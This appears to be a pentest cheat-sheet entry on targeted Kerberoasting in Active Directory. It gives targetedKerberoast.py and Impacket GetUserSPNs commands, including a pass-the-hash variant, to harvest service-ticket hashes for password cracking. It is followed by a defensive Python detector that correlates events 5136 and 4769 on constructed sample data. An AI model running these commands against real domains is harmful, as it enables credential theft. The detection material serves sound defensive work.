Kerberoasting
This abuse can be carried out when controlling an object that has GenericAll, GenericWrite, WriteProperty or Validated-SPN rights over the target. A member of the Account Operators group usually has those permissions.
The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting.
Alternative #1: targetedKerberoast.py (Python)
targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD
Alternative #2: Using Impacket.
impacket-GetUserSPNs -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
impacket-GetUserSPNs -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
Once the Kerberoast hash is obtained, it can be cracked to recover the account's password if that password is weak enough.
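For defenders, the sequence described above (an SPN written to a user account, then a service ticket requested for it) can be detected by correlating Windows Security events 5136 (directory object modified) and 4769 (service ticket requested). The following is an added example, not part of the original page or of either tool; the event dictionaries are constructed and simplified, and the 30-minute window and the CN-equals-sAMAccountName mapping are assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed correlation window; tune per environment
VALUE_ADDED = "%%14674"         # OperationType of event 5136 for "Value Added"

def cn_of(dn):
    # Assumption: the object's CN equals its sAMAccountName; resolve via LDAP otherwise.
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_targeted_kerberoast(events):
    """Alert when an SPN is added to a user object (5136) and a service ticket
    for that same account is requested (4769) within WINDOW."""
    spn_adds, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 5136:
            if (ev["ObjectClass"] == "user" and ev["OperationType"] == VALUE_ADDED
                    and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"):
                spn_adds[cn_of(ev["ObjectDN"])] = ev
        elif ev["id"] == 4769:
            add = spn_adds.get(ev["ServiceName"].lower())
            if add and ev["time"] - add["time"] <= WINDOW:
                requester = ev["TargetUserName"].split("@")[0].lower()
                alerts.append({
                    "account": ev["ServiceName"],
                    "spn_added_by": add["SubjectUserName"],
                    "ticket_requested_by": ev["TargetUserName"],
                    "rc4_ticket": ev["TicketEncryptionType"] == "0x17",
                    "same_actor": requester == add["SubjectUserName"].lower(),
                })
    return alerts

# Constructed sample events (simplified dicts, not real log data).
T0 = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    {"id": 5136, "time": T0, "SubjectUserName": "helpdesk1", "ObjectClass": "user",
     "ObjectDN": "CN=jdoe,OU=Staff,DC=corp,DC=example", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "servicePrincipalName"},
    {"id": 4769, "time": T0 + timedelta(seconds=5), "ServiceName": "jdoe",
     "TargetUserName": "helpdesk1@CORP.EXAMPLE", "TicketEncryptionType": "0x17"},
    # Ticket for a service account with no recent SPN change: no alert.
    {"id": 4769, "time": T0 + timedelta(minutes=1), "ServiceName": "svc_sql",
     "TargetUserName": "alice@CORP.EXAMPLE", "TicketEncryptionType": "0x12"},
    # SPN added to a computer object: out of scope for this rule.
    {"id": 5136, "time": T0 + timedelta(minutes=2), "SubjectUserName": "admin1",
     "ObjectClass": "computer", "ObjectDN": "CN=WS01,OU=PCs,DC=corp,DC=example",
     "OperationType": VALUE_ADDED, "AttributeLDAPDisplayName": "servicePrincipalName"},
]

if __name__ == "__main__":
    for alert in find_targeted_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the target objects carry a matching SACL; event 4769 requires Kerberos Service Ticket Operations auditing on the domain controllers.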